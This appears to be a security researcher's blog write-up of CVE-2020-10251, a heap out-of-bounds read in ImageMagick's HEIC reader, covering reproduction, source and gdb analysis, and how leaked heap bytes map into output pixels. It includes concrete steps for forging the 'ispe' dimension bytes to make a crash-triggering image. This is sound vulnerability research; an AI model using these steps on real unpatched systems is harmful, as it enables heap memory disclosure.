ImageMagick Vulnerability Analysis

In the past, I had done some research in the automated detection of vulnerabilities in binaries. There were a few vulnerabilities that I used as a benchmark for my algorithm to detect, one of which was CVE-2020-25674. This CVE was a bug in ImageMagick, “a widely deployed, general purpose image processing library written in C, most commonly used to resize, transcode or annotate user supplied images on the web… Given its maturity, performance and permissive licencing, ImageMagick is commonly employed for backend image processing for most consumer related software that deal with images” (Ben Simmonds). This bug allowed for an out-of-bounds (OOB) read on the heap. On Github, there were many such closed issues with a proof-of-concept (POC) exploit image file and sometimes, sanitiser logs. With work freeing up recently, I decided to explore some of these vulnerabilities and see how exploitable they were. In this post, we will focus our efforts on CVE-2020-10251, the most recent issue on the ImageMagick repository with the “Bug” label.

Reproducing the vulnerability

Before we start, here is the description of the vulnerability from the Github issue author: “An out-of-bounds read vulnerability exists within the “ReadHEICImageByID()” function (ImageMagick\coders\heic.c) which can be triggered via an image with width or height in pixel more than length or actual physical size of the image.”. A POC heic format image file (password: girlelecta) was provided, along with the ImageMagick command that triggered the bug: “magick convert poc.heic new.png”. More on the heic image format later – let’s first make sure that we can even reproduce the vulnerability.

Here are the steps I took to set up my environment:

Set up a Docker container. I used a Ubuntu 20.04 image, mounted to a local folder, and installed gcc, gdb, gef.
Look for the vulnerable version of ImageMagick on Github. The latest version would already be patched. For this CVE, the latest vulnerable version is 7.0.9-27, i.e. the patch happened in version 7.0.10-0.
Install ImageMagick from source. As this vulnerability involves heic functionality, which ImageMagick does not support out of the box, additional steps have to be taken to enable heic support.
Optionally, you may want to save the container as an image. It may also be helpful to enable disabling ASLR in gdb.

Finally, start up and attach to your container. Running the command “magick convert poc.heic new.png” will trigger a core dump. To verify that the core dump is not just a faulty installation, you can download a sample heic image from the internet and convert it instead. Analysing the core dump in gdb and looking at the back trace, we can see that an abort signal was triggered in the “ReadHEICImageByID()” function, as reported. Finally, running the trigger command in gdb will also throw a SIGSEGV from within “ReadHEICImageByID()”.

root@ead3cd493e68:/problem# magick convert poc.heic new.png
Aborted (core dumped)
    
root@ead3cd493e68:/problem# gdb magick core-dump
(gdb) bt
#0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007f86f5ee0859 in __GI_abort () at abort.c:79
#2  0x00007f86f62495d2 in MagickSignalHandler (signal_number=0x6) at MagickCore/magick.c:1415
#3  0x00007f86f5f01090 in <signal handler called> () at /lib/x86_64-linux-gnu/libc.so.6
#4  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
#5  0x00007f86f5ee0859 in __GI_abort () at abort.c:79
#6  0x00007f86f62495d2 in MagickSignalHandler (signal_number=0xb) at MagickCore/magick.c:1415
#7  0x00007f86f5f01090 in <signal handler called> () at /lib/x86_64-linux-gnu/libc.so.6
#8  ReadHEICImageByID (image_info=image_info@entry=0x559f35f4e0e0, image=image@entry=0x559f35f577e0, heif_context=heif_context@entry=0x559f35f61ce0, image_id=<optimized out>, exception=exception@entry=0x559f35f43ed0) at ./MagickCore/pixel-accessor.h:856
...
    
(gdb) r convert poc.heic new.png
...
[#0] Id 1, Name: "magick", stopped 0x7ffff7e2e580 in ReadHEICImageByID (), reason: SIGSEGV

Understanding the vulnerability

Next, let’s try to understand the vulnerability from a high level by doing some source code analysis. The vulnerability lies in the ImageMagick “ReadHEICImageByID()” function, which is used to read an heic image file into memory. HEIC (High Efficiency Image Container) files are the standard image format for Apple devices. The trigger command “magick convert poc.heic new.png” converts an image of one file type (heic) to another file type (png). Intuitively, this would first involve reading the heic image file, applying a conversion algorithm, before writing the output file to disk. Looking at the vulnerable version of the function on Github, we can gather a rough idea of what the function does based on the comments.

Set the image size. “heif_image_handle_get_width()” and “heif_image_handle_get_height()” are called.
Copy HEIF image into ImageMagick data structures. Importantly, “heif_decode_image()” is called here.
If there are any decoding options, correct the width and height of the image. “heif_image_get_width()” and “heif_image_get_height()” are called here.
Iterate over the pixels of the image and set their pixel colours accordingly.

Looking at the Git diff of the patch commit, we see that the patch was to (3) – the width and height of the image are now corrected regardless of whether there are any decoding options. This is also hinted at by the patch author’s comment on the Github issue. This means that the following code will now always run:

/*
    Correct the width and height of the image.
  */
  image->columns=(size_t) heif_image_get_width(heif_image,heif_channel_Y);
  image->rows=(size_t) heif_image_get_height(heif_image,heif_channel_Y);
  status=SetImageExtent(image,image->columns,image->rows,exception);
  if (status == MagickFalse)
    {
      heif_image_release(heif_image);
      heif_image_handle_release(image_handle);
      return(MagickFalse);
    }

Okay… but where do we go from here? Let’s backtrack from our SIGSEGV.

Image not found: /assets/images/sigsegv

From GDB, we can see that the SIGSEGV occurs in the “SetPixelRed()” function. This is called as part of (4) of what “ReadHEICImageByID()” does, outlined above. Here is the relevant source code:

for (y=0; y < (ssize_t) image->rows; y++)
  {
    Quantum
      *q;

    register ssize_t
      x;

    q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
    if (q == (Quantum *) NULL)
      break;
    for (x=0; x < (ssize_t) image->columns; x++)
    {
      SetPixelRed(image,ScaleCharToQuantum((unsigned char) p_y[y*
        stride_y+x]),q);
      SetPixelGreen(image,ScaleCharToQuantum((unsigned char) p_cb[(y/2)*
        stride_cb+x/2]),q);
      SetPixelBlue(image,ScaleCharToQuantum((unsigned char) p_cr[(y/2)*
        stride_cr+x/2]),q);
      q+=GetPixelChannels(image);
    }
    if (SyncAuthenticPixels(image,exception) == MagickFalse)
      break;
  }

Looking at the for loops and the “p_y”, “p_cb”, “p_cr” arrays being accessed, we can guess that the SIGSEGV is due to an OOB array access (whether it is a read/write is irrelevant for now) in this segment. Let’s trace back further to see how the bounds of the loop is set. We see that the loop’s bounds are “image->rows” and “image->columns”, which were part of the patch above, specifically L353-354:

  image->columns=(size_t) heif_image_get_width(heif_image,heif_channel_Y);
  image->rows=(size_t) heif_image_get_height(heif_image,heif_channel_Y);

According to the comments, this is where the image width and height is corrected. Prior to the patch, the width and height were sometimes not corrected, leading to the bug. In other words, the bug would be fixed by correcting the width and height. Prior to the patch, this behaviour would happen when there were no decoding options set (L348):

if (decode_options != (struct heif_decoding_options *) NULL)

Looking earlier in the function, we see that “decode_options” is defined as a null pointer in L332, and is only later set in L337 if the “heic:preserve-orientation” option is set. This is an command line option which we did not pass in with our trigger command, so the correction did not happen. This matches our expectation that since our trigger command triggered the bug, the width and height must not have been corrected.

All this implies that the image width and height were initially set somewhere else, and that their initial values were inaccurate (hence needing to be corrected). We continue by trying to answer these two questions: where is the image width and height set, and how were they inaccurate. Reading through the source code, we find that the width and height is initially set in (1) of the function outline, L309-310. Here “image->rows” and “image->columns” are both set.

  image->columns=(size_t) heif_image_handle_get_width(image_handle);
  image->rows=(size_t) heif_image_handle_get_height(image_handle);

Let’s summarize what we know so far. “image->columns” and “image->rows” are first set with “heif_image_handle_get_width()” and “heif_image_handle_get_height()”. Then, some operation happens in the middle, after which “image->columns” and “image->rows” need to be corrected. If they are not corrected, then an OOB array access happens, where “image->columns” and “image->rows” are used as the loop bounds. Let’s crack one more bit of the puzzle before we move on to producing a minimal test case. What happens in the middle?

Looking at the source code again, we see that the interesting behaviour is likely triggered by the “heif_decode_image()” call which happens in (2). This is hinted at by the patch author’s comment in the Github issue: “It seems that we always need to call heif_image_get_width and heif_image_get_height after the image has been decoded”. Let’s try reproducing this on our own.

Producing a minimal test case

With a minimal test case, we retain the buggy behaviour of the ImageMagick binary while remaining lightweight. This makes testing possible POC files easier. There are three main things we want our test case to do:

Call “heif_image_handle_get_width()” and “heif_image_handle_get_height()”
Call “heif_decode_image()”
Call “heif_image_get_width()” and “heif_image_get_height()”

This will allow us to see what the initial wrong value is in (1) and what the corrected value is in (3). We can adapt an example from the libheif documentation to fit our needs. libheif is the external C library behind much of ImageMagick’s heif capabilities. Note that the options ImageMagick uses for decoding are different from that in the example. Here is the test case I came up with:

#include <libheif/heif.h>
#include <stdio.h>

int main()
{
    int w, h;
    const char input_filename[] = "poc.heic";
    struct heif_context *ctx = heif_context_alloc();
    heif_context_read_from_file(ctx, input_filename, 0);

    // get a handle to the primary image
    struct heif_image_handle *handle;
    heif_context_get_primary_image_handle(ctx, &handle);

    w = heif_image_handle_get_width(handle);
    h = heif_image_handle_get_height(handle);
    printf("Width: %d\nHeight: %d\n", w, h);

    // decode the image and convert colorspace to RGB, saved as 24bit interleaved
    struct heif_image *img;
    heif_decode_image(handle, &img, heif_colorspace_YCbCr, heif_chroma_420, 0);

    w = heif_image_get_width(img, heif_channel_Y);
    h = heif_image_get_height(img, heif_channel_Y);
    printf("Width: %d\nHeight: %d\n", w, h);
}

Compile and run in the Docker container:

root@ead3cd493e68:/problem# gcc minimal_test_case.c -lheif -o minimal_test_case
root@ead3cd493e68:/problem# ./minimal_test_case 
Width: 1280
Height: 4439
Width: 1280
Height: 854

Voila! We have managed to identify a discrepancy between the values in (1) and (3).

Let’s put what we’ve found so far in context of the vulnerability.

Initially, “heif_image_handle_get_height()” sets “image->rows” to 4439.
The image is then decoded with “heif_decode_image()”. According to libheif documentation, the function does: “Decode an heif_image_handle into the actual pixel image and also carry out all geometric transformations specified in the HEIF file (rotation, cropping, mirroring).”
Next, because the “heic:preserve-orientation” command line option is not set, “image->rows” is not corrected to its correct value of 854.
Finally, an array of pixels is retrieved from the decoded heic image with “heif_image_get_plane_readonly()”. This array is then accessed OOB, as the loop bound is still set to 4439, and not 854.

To clarify, since the array of pixels corresponds to the actual pixel data, if there were only X number of pixels, but we tried to access Y number of pixels, we can expect an OOB access (when Y > X).

Narrowing down

With a better understanding of the vulnerability, let’s try to pinpoint what exactly triggers the vulnerability. Recall that the decode function also carries out transformations specified in the heic file, including cropping. The most intuitive idea I had was that there was a cropping transformation that caused the image’s height to shrink after it was decoded. To test my hypothesis, I enabled the option to ignore transformations in the decoding process, to see if the height still shrunk.

    struct heif_decoding_options *decode_options = heif_decoding_options_alloc();
    decode_options->ignore_transformations = 1;

    struct heif_image *img;
    heif_decode_image(handle, &img, heif_colorspace_YCbCr, heif_chroma_420, decode_options);

Surprisingly, it still shrunk, meaning that it was not a transformation that was causing the height to shrink. This testing process was useful as it was much shorter than the time it would have taken to understanding the libheif decoding / transformation code from scratch.

Triggering the vulnerability

Next, I hypothesized that a malicious modification of the image file could cause the initial “heif_image_handle_get_width()” and “heif_image_handle_get_height()” call to return the wrong values. Since these functions were called prior to the image being decoded, libheif still did not have access to the decoded pixel data of the image. This meant that it must be getting its height and width somewhere else, likely from some image metadata. This gives us the idea of metadata corruption.

Looking at the technical specification for the heif format, under Table VII, we see that heif allows the storage of image properties. Interestingly for us, there is “Image spatial Extents (‘ispe’)” property which “indicates the width and height of the associated image item”. Maybe this is where ImageMagick gets the image dimensions from, prior to decoding. Let’s continue by finding where the ispe is located within the heic file. The following documentation is quite helpful:

* ftyp (major='heix')
* meta
    * hdlr (handler = 'pict')
    * uuid: b'85c0b687820f11e08111f4ce462b6a48'
        * CNCV: **b'CanonHEIF001/10.00.00/00.00.00'**
    * pitm (primary item)
    * iinf (item info box)
        * infe (info entry)
        * infe
        * ...
    * iref (item references box)
        * dimg (derived image)
        * thmb (thumbnail)
        * thmb
        * cdsc (content description)
        * cdsc
    * iprp (item properties box)
        * ipco (item properties container)
            * hvcC (HEVC configuration)
            * ispe (Image spatial extents = width and height )
            * colr (colour information)
            * pixi (pixel information)
            * irot (image rotation)
            * hvcC
            * ...

We see that under the “meta” tag lies our “iprp”, which contains a “ipco” with the “ispe”. Opening up “poc.heic” in a text editor, we see these familiar strings (“meta” highlighted).

At offset 0x1f5, we see “ispe”, and the width and height in hex (05 00, 11 57) shortly after. Manually changing the width to 1281 (05 01) and running our test case again:

root@ead3cd493e68:/problem# ./minimal_test_case 
Width: 1281
Height: 4439
Width: 1280
Height: 854

We have successfully controlled the value of “heif_image_handle_get_width()”. To confirm that we can trigger the vulnerability, let’s try turning a benign heic file into an exploit file. Using the following sample, let’s first check that ImageMagick can convert it successfully.

root@ead3cd493e68:/problem# magick convert sample.heic out.png
root@ead3cd493e68:/problem#

Next, let’s manually increase the width via editing ispe. This time, the width is located at offset 0x17b. Let’s change it from 960 (03 c0) to 5056 (13 c0).

root@ead3cd493e68:/problem# magick convert sample_vuln.heic out.png
Aborted (core dumped)
root@ead3cd493e68:/problem#

We have successfully triggered the vulnerability!

Static analysis: OOB access

Now, let’s try to control the vulnerability to do something useful. First, let’s figure out what the vulnerability allows us to do. Recall that the vulnerability lies in an array OOB access:

p_y = heif_image_get_plane_readonly(heif_image, heif_channel_Y, &stride_y);
p_cb = heif_image_get_plane_readonly(heif_image, heif_channel_Cb, &stride_cb);
p_cr = heif_image_get_plane_readonly(heif_image, heif_channel_Cr, &stride_cr);
...
for (y=0; y < (ssize_t) image->rows; y++)
  {
    Quantum *q;
    register ssize_t x;
    q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
    if (q == (Quantum *) NULL)
      break;
    for (x=0; x < (ssize_t) image->columns; x++)
    {
      SetPixelRed(image,ScaleCharToQuantum((unsigned char) p_y[y*
        stride_y+x]),q);  // OOB access
      SetPixelGreen(image,ScaleCharToQuantum((unsigned char) p_cb[(y/2)*
        stride_cb+x/2]),q);  // OOB access
      SetPixelBlue(image,ScaleCharToQuantum((unsigned char) p_cr[(y/2)*
        stride_cr+x/2]),q);  // OOB access
      q+=GetPixelChannels(image);
    }
    if (SyncAuthenticPixels(image,exception) == MagickFalse)
      break;
  }

The “p_y”, “p_cb”, “p_cr” arrays correspond to the actual pixel data extracted from the image, namely the three channels from the heic image. ImageMagick reads the heic file using a YCbCr colorspace, which is different from the familiar RGB colorspace. Naturally, a conversion will have to take place later on if we convert the image into a file format that uses the RGB colorspace, like PNG (by default). Normally, ImageMagick will access the pixel arrays via an index that corresponds to a (x, y) coordinate. By forging the image dimensions in the ispe earlier, we can trick ImageMagick into accessing pixel data that is beyond the largest coordinate of the image. Since the pixel arrays are 1-dimensional arrays, a third parameter, the stride, is used to access data at a (x, y) coordinate. The stride is provided by the original “heif_image_get_plane_readonly()” call.

Next, let’s figure out where the pixel arrays reside in memory through dynamic analysis. We want to place a breakpoint at the “heif_image_get_plane_readonly()” call to check its return value, which would be the memory address of the pixel arrays. From the backtrace, notice that the “ReadHEICImageByID()” function is an external symbol from “libMagickCore-7.Q16HDRI.so.6”. For easier debugging, we can extract the library from our Docker container (locate it using “vmmap” in GDB, and then use “docker cp” to retrieve it). From Ghidra, it is easy to find the address at which the “heif_image_get_plane_readonly()” takes place.

Because ReadHEICImageByID is an external symbol, GDB will be unable to resolve it when running the binary from scratch. Instead, we need to break at main, then enable the desired breakpoints. After the “heif_image_get_plane_readonly()” call, we can see that the return value (stored in rax) is located within the heap.

In fact, the three arrays are located on the heap with “p_cr” at the lowest address, “p_cb” in the middle, and “p_y” near the end of the heap. This makes sense why a SIGSEGV is triggered, as accessing “p_y” OOB would access unmapped memory beyond the heap.

Finally, let’s determine if the OOB access is a read or a write by reading the source code. The code that triggers the OOB access is this:

SetPixelRed(image,ScaleCharToQuantum((unsigned char) p_y[y*stride_y+x]),q);

ScaleCharToQuantum has various definitions, depending on the value of “MAGICKCORE_QUANTUM_DEPTH”. This was set as a compilation flag, which we can access via Magick++-config.

$ Magick++-config --cxxflags
-fopenmp -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 -fopenmp -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 -fopenmp -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16 -I/usr/local/include/ImageMagick-7

In my default installation of ImageMagick, we see that MAGICKCORE_QUANTUM_DEPTH is set to 16. The corresponding definition of ScaleCharToQuantum is as follows:

#elif (MAGICKCORE_QUANTUM_DEPTH == 16)
static inline Quantum ScaleCharToQuantum(const unsigned char value)
{
#if !defined(MAGICKCORE_HDRI_SUPPORT)
  return((Quantum) (257U*value));
#else
  return((Quantum) (257.0*value));
#endif
}

So, this reads the pixel value at a given coordinate and returns 257 times the original value. Next, “SetPixelRed()” is an inlined function that does the following:

static inline void SetPixelRed(const Image *magick_restrict image,
  const Quantum red,Quantum *magick_restrict pixel)
{
  pixel[image->channel_map[RedPixelChannel].offset]=red;
}

Putting this together, the OOB access does an OOB read on a heap pixel array and sets the red channel of the quantum “q” to 257 times that value. This means that we can use the vulnerability to leak heap data. However, this is not a straightforward leak. As I previously alluded to, this raw pixel data is in the YCbCr format, which will be encoded into RGB and then possibly compressed before being saved to the output image. In order to recover the original heap data, we still need to figure out how it is transformed into the output image.

Dynamic analysis: heap to image

Static analysis isn’t very useful in determining where our leaked heap data goes, and consequently how it is transformed. There are tons of functions called by the ImageMagick binary and following the flow of execution after “ReadHEICImageByID()” will be very tedious, if not straight-out infeasible. Instead, we will turn to dynamic analysis to understand the process our leaked heap data takes from the initial leak to its final destination, the output image. For simplicity, we will use a smaller heic image instead of the original poc. I used ImageMagick to resize the previous sample file to a size of 64x64.

$ magick convert sample.heic -resize 64x64\! 64x64.heic

Repeat the previous process of forging the ispe to obtain a vulnerable image of width 64, and height 65. Why do we modify the height, but leave the width intact? Let’s backtrack to the OOB read.

for (y=0; y < (ssize_t) image->rows; y++)
  {
    Quantum *q;
    register ssize_t x;
    q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
    if (q == (Quantum *) NULL)
      break;
    for (x=0; x < (ssize_t) image->columns; x++)
    {
      SetPixelRed(image,ScaleCharToQuantum((unsigned char) p_y[y*stride_y+x]),q);
      ...

Notice that y is a value from 0 to image->rows (ispe height) and x is a value from 0 to image->columns (ispe width). From experimentation in GDB, we can find that stride_y equals the real image width. By increasing the ispe height, we increase the number of values y takes on, while keeping the set of values of x the same. Resultantly, we sequentially read every byte (char) in p_y, which is cleaner than the alternative of changing the width. Note that using a smaller image and smaller OOB read will also help avoid a SIGSEGV, allowing us to trace the data flow till the program finishes.

We will first try to spot patterns in how the heap data ends up in the output image. This is faster compared to rigorously analyzing the data flow. Let’s see what we get when we try to convert the vulnerable image.

$ magick convert 64x64_vuln.heic out.png
$ exiftool out.png
...
Image Size                      : 64x65
...

We get an output image that retains the forged dimensions. Viewing the image, we can see that the last row of pixels is solid green, with some noise. We can view the exact RGB values of the PNG’s last row with a Python script.

from PIL import Image
im = Image.open('out.png')
pixels = list(im.getdata())
width, height = im.size
pixels = [pixels[i * width:(i + 1) * width] for i in range(height)]
print(pixels[-1])

The majority of RGB(0, 135, 0) corresponds to the green colour we were seeing. The pixels contributing to the noise can also be seen. We can find out the heap data represented by the pixels through GDB. Like before, let’s break after the first “heif_image_get_plane()” call so that we can get the stride and the heap address of the pixels. Recall that “stride_y” is passed as the third argument to the function call, so we can get access its value in the rdx register. The heap address is the function return value, stored in rax. We can read the actual pixel data in the array by dereferencing it accordingly (stride_y * y + x). The first row of actual pixel data to the last row at index 63 contain the 64 rows of real data. As expected, (OOB) reading the array at row index 64 gives no pixel data. In fact, the heap at this location contains only null bytes and some heap metadata. This corresponds to our previous observation – mainly RGB(0, 135, 0) (null bytes) and some noise (heap metadata). We can follow a similar method to find that the OOB reads of the other two pixel arrays also contain mainly null bytes.

(gdb) b *(ReadHEICImageByID+439)
Breakpoint 2 at 0x7ffff7e2e477: file coders/heic.c, line 364.
(gdb) r convert 64x64_vuln.heic out.png
Starting program: /usr/local/bin/magick convert 64x64_vuln.heic out.png
...
(gdb) x/x $rdx
0x7fffffff4694: 0x0000000000000040
(gdb) info reg rax
rax            0x5555555abc60      0x5555555abc60
(gdb) x/8gx $rax
0x5555555abc60: 0x3d3733353d333138      0x35292a31302a253d
0x5555555abc70: 0x4a4c4b533a332a3e      0x3d332f4c51575549
0x5555555abc80: 0x4445433a3f434b4b      0x6b41314554323243
0x5555555abc90: 0x414a4e535055616d      0x1726271e221f2f3a
(gdb) x/8gx $rax+0x40*63
0x5555555acc20: 0x1b150c120c1d1c14      0x20160f15110d1015
0x5555555acc30: 0x27292c1f231e2329      0x303338302a2c3026
0x5555555acc40: 0x2d2b292b3428262d      0x1e1c31222a3c311d
0x5555555acc50: 0x2428292533292838      0x201b29211d192129
(gdb) x/8gx $rax+0x40*64
0x5555555acc60: 0x0000000000000000      0x0000000000000000
0x5555555acc70: 0x0000000000001020      0x0000000000001021
0x5555555acc80: 0x00005555555ae3d0      0x00005555555a3460
0x5555555acc90: 0x0000000000000000      0x0000000000000000

Next, let’s change some of the OOB read null bytes and see how the output PNG’s RGB values change.

(gdb) set {long}($rax+0x40*64) = 0x4847464544434241
(gdb) c
Continuing.
[Inferior 1 (process 487) exited normally]
$ py imreader.py
[(0, 200, 0), (0, 201, 0), (0, 202, 0), (0, 203, 0), (0, 204, 0), (0, 205, 0), (0, 206, 0), (0, 207, 0)...

We get a linear relationship! The pixel containing 0x41 is (0, 200, 0) and was originally (0, 135, 0), which is an increase of exactly 0x41. Same with each of the other 7 bytes. However, things aren’t so straightforward… If we replace the pixel data with 0x81, the resultant RGB value is (0, 255, 0), but we get the same RGB value if we use 0x91. So it seems like the linear relationship holds, but only to a certain limit, beyond which we cannot recover the heap data. Strangely enough, if we use a larger value like 0xc1, the R value starts to change – we get (14, 255, 0). Even stranger, if we use an even larger value of 0xf1, the B value changes too – we get the RGB value of (62, 255, 15). This relationship is quite unusual when we consider it in light of a typical YCbCr to RGB conversion formula.

# a, b, c, d, e are constants
R = Y + e * Cr
G = Y - (a * e / b) * Cr - (c * d / b) * Cb
B = Y + d * Cb

Notably, R, G and B all scale linearly with Y, which is exactly what we were changing earlier. However, the relationship wasn’t so simple. Those more experienced in reverse engineering may already have some idea of what is going on, but let’s continue with dynamic analysis to clear things up. We also need to check the exact values of the constants ImageMagick uses for conversion.

Before we continue, at this point, some may have the idea of outputting to a heic file instead of a png, i.e. “magick convert 64x64_vuln.heic out.heic”. This would presumably skip any conversion process. Then, we can directly read the OOB heap data from the output image via the same means they were originally read in the ImageMagick binary, via the libheif “heif_image_get_plane_readonly()” API. The “conversion” does work, producing an output heic image of size 64x65. Unfortunately, the YCbCr values read from the last row of the output heic image does not correspond exactly to the OOB heap data we control. For instance, writing 0x41 into the p_y array gives a Y value of 0x75. This is the code I used to read the output heic file:

// gcc read_heic.c -lheif -o read_heic && ./read_heic
#include <libheif/heif.h>
#include <stdio.h>

int main()
{
    const char input_filename[] = "out.heic";
    struct heif_context *ctx = heif_context_alloc();
    heif_context_read_from_file(ctx, input_filename, 0);

    struct heif_image_handle *handle;
    heif_context_get_primary_image_handle(ctx, &handle);

    struct heif_image *img;
    heif_decode_image(handle, &img, heif_colorspace_YCbCr, heif_chroma_420, 0);

    int stride_y, stride_cb, stride_cr;
    const uint8_t *p_y = heif_image_get_plane_readonly(img, heif_channel_Y, &stride_y);
    const uint8_t *p_cb = heif_image_get_plane_readonly(img, heif_channel_Cb, &stride_cb);
    const uint8_t *p_cr = heif_image_get_plane_readonly(img, heif_channel_Cr, &stride_cr);

    for (int i = 0; i < 8; i++)
    {
        uint8_t a = p_y[stride_y * 64 + i];
        uint8_t b = p_cb[stride_cb * 32 + i/2];
        uint8_t c = p_cr[stride_cr * 32 + i/2];
        printf("Pixel data: %d %d %d\n", a, b, c);
    }
}

Back to dynamic analysis. Note that we are concerned with the data flow, and not the control flow. For simplicity, we will convert the vulnerable heic file into an rgb file instead of a png. According to the ImageMagick documentation, a rgb file is “Raw red, green, and blue samples”. The first byte is the hex value of the R value of the first pixel, the second byte the G value, the third byte the B value. This repeats for the fourth to sixth bytes being for the second pixel, and so on. You can verify that the RGB values are the same as the produced RGB file, and that the OOB bytes are output as expected. The reason for choosing this format is that unlike PNG, which has an encoding algorithm, the RGB format stores the RGB values raw, which should make tracing their flow through the program easier. After we have a better understanding of the transformations, we can then apply the same concepts to the PNG format. Once again, we break at the first “heif_image_get_plane()” call. We also set an access watchpoint (awatch) on the OOB bytes.

(gdb) r convert 64x64_vuln.heic out.rgb
(gdb) x/8gx $rax+0x40*64
0x5555555acc60: 0x0000000000000000      0x0000000000000000
0x5555555acc70: 0x0000000000001020      0x0000000000001021
0x5555555acc80: 0x00005555555ae3d0      0x00005555555a3460
0x5555555acc90: 0x0000000000000000      0x0000000000000000
(gdb) set {long}0x5555555acc60 = 0x4847464544434241
(gdb) awatch *0x5555555acc60
Hardware access (read/write) watchpoint 3: *0x5555555acc60

The watchpoint gets hit in the SetPixelRed function, at ReadHEICImageByID+704 (SetPixelRed is inlined). Here, a byte from the OOB address is written into edx. $r15+$rax*1 == 0x5555555acc60 corresponds to the first OOB byte that we set a watchpoint on earlier.

(gdb) x/16i ReadHEICImageByID+704
   0x7ffff7e2e580 <ReadHEICImageByID+704>:      movzx  edx,BYTE PTR [r15+rax*1]
=> 0x7ffff7e2e585 <ReadHEICImageByID+709>:      pxor   xmm0,xmm0
   0x7ffff7e2e589 <ReadHEICImageByID+713>:      mov    rsi,rcx
   0x7ffff7e2e58c <ReadHEICImageByID+716>:      sub    rsi,r8
   0x7ffff7e2e58f <ReadHEICImageByID+719>:      cvtsi2sd xmm0,edx
   0x7ffff7e2e593 <ReadHEICImageByID+723>:      mov    rdx,rax
   0x7ffff7e2e596 <ReadHEICImageByID+726>:      sar    rdx,1
   0x7ffff7e2e599 <ReadHEICImageByID+729>:      add    rax,0x1
   0x7ffff7e2e59d <ReadHEICImageByID+733>:      mulsd  xmm0,xmm1
   0x7ffff7e2e5a1 <ReadHEICImageByID+737>:      cvtsd2ss xmm0,xmm0
   0x7ffff7e2e5a5 <ReadHEICImageByID+741>:      movss  DWORD PTR [rcx],xmm0
...
(gdb) info reg rax
rax            0x0                 0x0
(gdb) info reg r15
r15            0x5555555acc60      0x5555555acc60

We can see that our OOB byte is moved into edx, and subsequently xmm0 (ReadHEICImageByID+719), and finally into a pointer in rcx (ReadHEICImageByID+741). This looks like where the quantum’s value is finally assigned. This is also corroborated by the Ghidra decompilation. Noticably, the “movss DWORD PTR [r??], xmm0” instruction can be seen three times in the disassembly, corresponding to each of the three inlined set pixel functions. Breaking at ReadHEICImageByID+741, where the quantum’s value is set to our OOB byte, we can see the address rcx points to and add a watch point for that as well. We can also read the value stored in that pointer. The value of 16705 corresponds to 257 * 0x41, which is the return value of the ScaleCharToQuantum() call, as discussed earlier.

(gdb) b *(ReadHEICImageByID+741)
Breakpoint 4 at 0x7ffff7e2e5a5: file ./MagickCore/pixel-accessor.h, line 856.
(gdb) c
...
(gdb) info reg rcx
rcx            0x5555555bb840      0x5555555bb840
(gdb) awatch *0x5555555bb840
Hardware access (read/write) watchpoint 5: *0x5555555bb840
(gdb) ni
...
(gdb) p/f *(float*)$rcx
$3 = 16705

As we continue execution, our two access breakpoints get hit a few times, but our initial access breakpoint isn’t really used for anything interesting anymore. The first interesting access we get is in “TransformsRGBImage()”, and occurs on our second access breakpoint. Here, GetPixelRed (also inlined) is called, which is a usage pattern that makes sense. First the quantum’s value is set with SetPixelRed, then its value is retrieved with GetPixelRed for use in converting the colourspace from yCbCr to RGB. We can look through the source code of the TransformsRGBImage() function, but it is really long. Scanning through, it seems to be using a switch case with the options being various source colourspaces. Searching for the string “yCbCr” yields a promising result – a call to “ConvertYCbCrToRGB()”.

case YCbCrColorspace:
    {
      ConvertYCbCrToRGB(X,Y,Z,&red,&green,&blue);
      break;
    }

Going back a bit further in the source code, we see:

  double blue, green, red, X, Y, Z;
  X=QuantumScale*GetPixelRed(image,q);
  Y=QuantumScale*GetPixelGreen(image,q);
  Z=QuantumScale*GetPixelBlue(image,q);

So, our OOB value is set to X with the GetPixelRed() function. Note that QuantumScale is 1 / 65535, which divides X by 257 (reversing the initial “ScaleCharToQuantum()” call) and then again by 255 (normalising the pixel value to between 0 and 1). X is then used by the “ConvertYCbCrToRGB()” function, which calls the “ConvertYPbPrToRGB()” function.

static void ConvertYPbPrToRGB(const double Y,const double Pb,const double Pr,
  double *red,double *green,double *blue)
{
  *red=QuantumRange*(0.99999999999914679361*Y-1.2188941887145875e-06*(Pb-0.5)+
    1.4019995886561440468*(Pr-0.5));
  *green=QuantumRange*(0.99999975910502514331*Y-0.34413567816504303521*(Pb-0.5)-
    0.71413649331646789076*(Pr-0.5));
  *blue=QuantumRange*(1.00000124040004623180*Y+1.77200006607230409200*(Pb-0.5)+
    2.1453384174593273e-06*(Pr-0.5));
}

This does a standard yCbCr to RGB conversion, and then scales the value up by QuantumRange == 65535. Finally, the quantum’s value is re-set with “SetPixelRed()”.

  SetPixelRed(image,ClampToQuantum(red),q);
  SetPixelGreen(image,ClampToQuantum(green),q);
  SetPixelBlue(image,ClampToQuantum(blue),q);

The function “ClampToQuantum()” restricts the range of values for the quantum, from 0 to 65535, the “QuantumRange”. This is the cause behind the earlier abnormal relationship between the OOB byte and the corresponding output RGB value. While changing Y did increase red and blue as well, their values were still negative. This can be shown by recreating the conversion function (shown below). This can be verified in GDB as well.

double Y, Pb, Pr, red, green, blue;
Y = 0.25490196078431371; // 65 * 257 / 65535
Pb = 0;
Pr = 0;

double dVar1, dVar2;
dVar1 = Pb - 0.5;
dVar2 = Pr - 0.5;
red = ((Y * 0.9999999999991468 - dVar1 * 1.218894188714587e-06) + dVar2 * 1.401999588656144) *
       65535.0;
green = ((Y * 0.9999997591050251 - dVar1 * 0.344135678165043) - dVar2 * 0.7141364933164679) *
         65535.0;
blue = (Y * 1.000001240400046 + dVar1 * 1.772000066072304 + dVar2 * 2.145338417459327e-06) *
        65535.0;

printf("%f %f %f\n", red, green, blue);
// -29234.981581 51381.929355 -41359.061742

This is why in the output image file, red and blue were bound to the minimum value of 0, while green was 200 == 51381.929355 / 257.

